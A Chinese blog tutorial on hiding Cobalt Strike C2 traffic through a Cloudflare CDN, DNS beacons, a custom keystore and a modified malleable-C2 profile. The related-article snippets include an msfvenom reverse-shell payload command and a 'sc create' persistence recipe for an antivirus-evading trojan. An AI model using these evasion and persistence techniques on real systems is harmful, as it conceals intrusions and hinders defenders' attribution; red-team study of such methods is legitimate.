Cobaltstrike隐藏上线

已于 2023-04-29 17:12:21 修改
阅读量641 收藏 4
点赞数
分类专栏: 流量隐藏 文章标签: web安全 网络安全
于 2023-04-29 16:59:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_53747497/article/details/130441891
版权

根据前面的文章进行的cdn和域名配置完成后在cs上执行的操作。

http上线
  1. 配置Listener HTTP Host Header ,必须填写你的域名。

请添加图片描述

  1. 生成无阶段的木马

运行 木马,主机可以成功上线。可以发现不是自己的vps的ip地址。

请添加图片描述

优点:利用CDN分布式技术,不同区域的主机就近连接到CDN服务,优化了访问质量,隐藏了真实服务 器的ip;且CDN分布式技术可以在一定程度抵抗DDOS大流量攻击;使用国内CDN适合用于做红蓝对抗 技术比拼等合法目的。
缺点:受控主机还是通过我们自己的域名进行回连,对外还是能看到连接域名;且如果使用国内CDN的 服务(增加了风险),域名就必须完成ICP备案(增加了风险)

dns上线

1.先在cf上设置好dns的东西,然后去cs上创建一个监听器。再去使用这个监听器生成一个无阶段的木马,开始执行上线。

请添加图片描述

请添加图片描述

2.执行成功上线后会发现是空白的,直接点击交互,使用checkin命令强制回连到teamserver。就会显示出名称那些了。

请添加图片描述

请添加图片描述

注意:使用dns的话,回传的数据比较慢,一次性不会太多数据回来。想提高速度,就改模式为dns-txt

CS流量隐藏

  1. CS配置文件Profile
    下载地址
    https://github.com/threatexpress/malleable-c2
    https://github.com/threatexpress/malleable-c2/archive/refs/heads/master.zip

keystore 的生成方法:
去 Cloudflare 的 SSL/TLS > 源服务器 创建证书,使用默认配置生成 pem 和 key 。
保存源证书内容为 cloudflare.pem ,保存私钥内容为 cloudflare.key。和之前的MSF的https的方式创建一样。

2.将创建的 pem 和 key 文件上传至云服务器。执行以下命令,将生成的 keystore 文件放在云服务器CS的根目录下。

openssl pkcs12 -export -in cf.pem -inkey cf.key -out www.subia.top.p12 -name www.subia.top -passout pass:admin123


keytool -importkeystore -deststorepass admin123 -destkeypass admin123 -destkeystore www.subia.top.store -srckeystore www.subia.top.p12 -srcstoretype PKCS12 -srcstorepass admin123 -alias www.subia.top

请添加图片描述

3.然后对 4.3 版本 Profile 进行修改。将 keystore 文件名称和密码填入 profile 文件中。
一共有四处修改的地方。
(1) https-certificate 模块中的 keystore 和 password ,修改后把注释去掉

set keystore "www.subia.top.store" 
set password "admin123";

请添加图片描述

(2) http-stager 修改 Client 配置中的 Host 和 Referer,server中改成 *

请添加图片描述

(3) http-get 修改 Client 配置中的 Host 和 Referer,server中改成 *

请添加图片描述

(4) http-post 修改 Client 配置中的 Host 和 Referer,server中改成 *

4.执行 ./c2lint jquery-c2.4.7.profile ,出现这种页面就说明已经成功。

请添加图片描述

5.修改cdn的文件,先清除缓存,再开启开发者模式

6.测试上线 ,使用修改好的profile启动CS ,然后配置监听器。

./teamserver 172.17.45.88 cs jquery-c2.4.7.profil

请添加图片描述

请添加图片描述

7.生成无阶段的payload ,执行上线测试。发现并不是自己的真实ip,达到流量隐藏的效果。

请添加图片描述

CobaltStrike上线Linux主机编程
2301_79326857的博客
08-16 315
通过创建Payload、启动Cobalt Strike服务器以及建立与目标主机的连接,我们可以有效地模拟攻击者的行为,评估系统和网络的安全性。首先,确保你拥有一台运行Linux操作系统的主机,并安装好Cobalt Strike。填写监听器的相关信息,包括IP地址、端口号和Payload类型(选择Payload的语言和操作系统类型)等。一旦连接建立成功,你可以在Cobalt Strike的控制台中执行各种渗透测试任务,如发起攻击、获取系统信息、提权等。在目标Linux主机上运行前面创建的Python脚本。
CobaltStrike使用之如何上线
baidu_38844729的博客
11-22 1580
前言 已经拿到某台肉鸡的web权限,想进行后渗透攻击,进入内网收集信息,我们可以用到cobaltstrike msf反弹shell 1、制作反弹shell-exe文件在这里插入代码片 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.10.10.159 lport=4444 -f exe -o abc.exe lhost:攻击机IP lport:监听端口 2、msf运行命令 msfconsle msf5 > use exploit/mu
CobaltStrike windows7 无法上线
qq_43615820的博客
09-13 1860
CobaltStrike windows7 无法上线
阿里云部署cobal strike无法上线/连接解决方法
热门推荐
weixin_42238862的博客
01-26 1万+
一定要设置对应的地区,不然安全组设置是不会生效的!! 然后就是设置允许进入的CS端口了,允许的当然是你开启的CS的端口了 然后对于Ubuntu来说,关闭防火墙(ufw disable)或者设置防火墙通过对应的端口,这里自行百度 然后在主机上输入netstat -aptn查看是否开启了对应的端口 ...
Cobalt Strike 环境搭建与一次简单的上线教程
weixin_52049485的博客
01-08 8752
环境部署 服务器端:Kali 客户端:Win10 靶机:Win7 注意:CS基于java环境,首先安装java,jdk1.8 CS安装 将准备好的cs4.0压缩包拷贝到Kali中,解压后可以看到cs的目录结构 赋予 teamserver 执行权限 chmod +x teamsercer 运行方式:服务端ip,并且设置连接密码 ./teamserver 192.168.20.106 123456 如下图所示,cs就已经安装成功,进入等待客户端连接的状态。。。(默认50050端口) Windows客户端
CobaltStrike 上线到权限维持
Nocker888的博客
05-10 1567
CobaltStrike 上线到权限维持 Win系统上常用计划任务或注册表自启动,或者 ”白+黑” 的方法来达到权限维持的目的 自启动服务 前情提要: 权限要求:system权限 准备免杀马子,上传自定义路径 sc create "GoGo" binpath= "C:\Users\Arks7\Desktop\BypassMM\Exp.exe(路径)" sc description "GoGo" "360SB" sc config "GoGo" start= auto net start "GoGo"
cobalt strike笔记-常用beacon命令.pdf
04-03
在当今网络安全领域,Cobalt Strike 是一款备受关注的渗透测试工具。它主要用于模拟攻击,以便安全专家和渗透测试员可以更好地评估企业的安全防护水平。Cobalt Strike 使用的 Beacon payload 是一种被高级攻击者广泛...
Cobaltstrike主机上线psexec传递
潜心学安全的小白
03-10 3231
Psexec 简介 诸如Telnet之类的实用程序和诸如Symantec PC Anywhere之类的远程控制程序使您可以在远程系统上执行程序,但是设置起来很麻烦,并且要求您在希望访问的远程系统上安装客户端软件。PsExec是一种轻巧的telnet替代品,可让您在其他系统上执行进程,并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。PsExec最强大的用途包括在远程系统上启动交互式命令...
Cobalt Strike 结合Nginx
m0_59119089的博客
08-03 1013
Cobalt Strike 结合Nginx做反向代理 1. 概述 最近在折腾CobaltStrike 考虑的太多为了C2的隐蔽性 不被扫。索性做个反向代理,做一下流量过滤。 网上大概找了找 来来去去 就一篇文章。 索性自己折腾实践一下。 此处使用的 payload 为http (https没成功 正在研究中。。。 大佬有知道的指点一下 谢谢) 2. 准备 1 安装 Nginx 根据各自需求 apt install nginx #debain 系列 yum install nginx
cobaltstrike进阶篇之linux上线linux
最新发布
weixin_69925635的博客
06-05 796
cs的部署和基本上线过程可以参考我前面一篇文章,接下来尝试利用linux(服务端和客户端都放在同一台kali上)上线linux(ubuntu)将CrossC2-GithubBot-2023-03-27.cna其中path改成genCrossC2.linux的path。选择CSversion为4.4,日志中出现success,在指定目录下出现t_cc2.out,传到靶机并双击运行,成功上线。这个时候cs顶部会多出来一个选项,选择创建一个c2监听器,在之前需要先创建一个https的监听器。
Cobaltstrike上线流量隐藏
weixin_51151498的博客
05-10 1080
Cobaltstrike上线流量隐藏
cs(cobaltstrike)隐藏特征
qq_45092459的博客
09-21 1174
cs(cobaltstrike)隐藏特征
探索cs中http hosts与https hosts(stager)
Shanfenglan's blog
04-09 1898
文章目录前言实验总结 前言 一直没有完全确定这两个参数的用法,今天做了实验终于确定,于是有了这篇文章。 实验 我们开启两个cs的teamserver,ip分别为: 172.16.250.3 172.16.250.1 在172.16.250.3中我们设置一个listener如下: 172.16.250.1上的配置: 我们使用172.16.250.3生成一个木马: 双击之后两边的cs客户端都有上线: 总结 其他机器的监听端口,必须跟生成木马的机器的监听端口一致,否则无法上线。其他机器会在第一台机器
阿一网络安全学院课代表教你如何快速隐藏CS
qq_69775412的博客
05-31 973
原版的CobaltStrike存在某些未授权访问漏洞,以及特征太过于明显,以至于很容易被C2检测器发现。本文记录了一些隐藏特征的方法,这些方法不涉及更改cs底层jar文件,适合小白(指自己)快速部署。本文目标:从流量、端口、访问页面等方面尽可能隐藏cs流量,运用cdn实现IP隐匿,同时实现linuxC2通讯功能。
【渗透测试笔记】之【内网渗透——CS流量隐蔽】
AA8j的博客
11-22 4869
文章目录1. 端口特征2. 证书特征2. 配置CDN3. 生成自定义配置文件4. 效果演示 1. 端口特征 vim teamserver 将默认端口修改: -Dcobaltstrike.server_port=64444 2. 证书特征 删除原有证书(第一次启动会生成cobaltstrike.store),创建新证书cobaltstrike.store rm cobaltstrike.store keytool -keystore cobaltstrike.store -storepass 12345
CDN+Nginx反向代理来隐藏c2地址
一枚小白的分享,不喜勿喷~
10-23 2881
通过借助CDN和Nginx反向代理和HTTPS来隐藏真实c2服务器Nginx反向代理:通过Nginx对外部流量转发到本地,再设置防火墙只允许localhost访问cs端口达到IP白名单的效果
CobalStrike(CS)上线隐藏IP和流量
懂进攻知防守
08-06 2746
使用CDN内容分发网络的多节点分布式技术,通过“加速、代理、缓存”隐藏在后面的静态文件或服务;最终实现对外暴露的是CDN多节点的公网域名IP,很难甚至无法溯源真实后端服务器的域名或IP!......
Cobalt Strike几种不常见的上线方式
weixin_38168081的博客
08-12 3774
#Cobalt Strike新增了几种上线方式 介绍:Staged 和 Stageless 的区别. 前者的实际功能只是和 C2 建立连接并接收 Payload, 然后加载执行, 而 Stageless 直接省去了接收 Payload 的步骤. Stageless 生成除了的 Payload 都会比 Staged 类型的要大很多, 而且包含了特征明细 一.windows/b...
Cobaltstrike 不出网正向上线
问题很多的小明
08-06 1639
目录 Beacon TCP SMB Beacon listen中继 内网横向遇到目标不出网的几种情况 Beacon TCP 目标关闭防火墙,有一台主机出网,但是目标dc不出网,在原有出网主机的基础上尝试正向上线 生成分段传输Stageless的exe 目标机器执行exe 出网主机尝试执行 portscan 10.211.55.3 4444 none 64 connect 10.211.55.3 4444 上线成功 断开连接 unlin...
cobaltstrike 有几种上线方式
05-17
Cobalt Strike 有三种上线方式: 1. Beacon 上线:Beacon 是 Cobalt Strike 的主要上线方式。它使用域前置技术来隐藏流量,并可以在被动模式下运行,以免被检测到。Beacon 还支持多种通信通道,如 HTTP、DNS 和 SMB 等。 2. ExternalC2 上线:ExternalC2 是 Cobalt Strike 的新型上线方式,它可以使用第三方 C2 服务器来进行通信,这样可以避免受到防御者对 Cobalt Strike C2 服务器的监视和封锁。 3. PoshC2 上线:PoshC2 是 Cobalt Strike 的 PowerShell 版本,使用 PowerShell 脚本来进行通信。这种方式可以避免使用 Cobalt Strike 的二进制文件,从而避免被杀软检测到。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值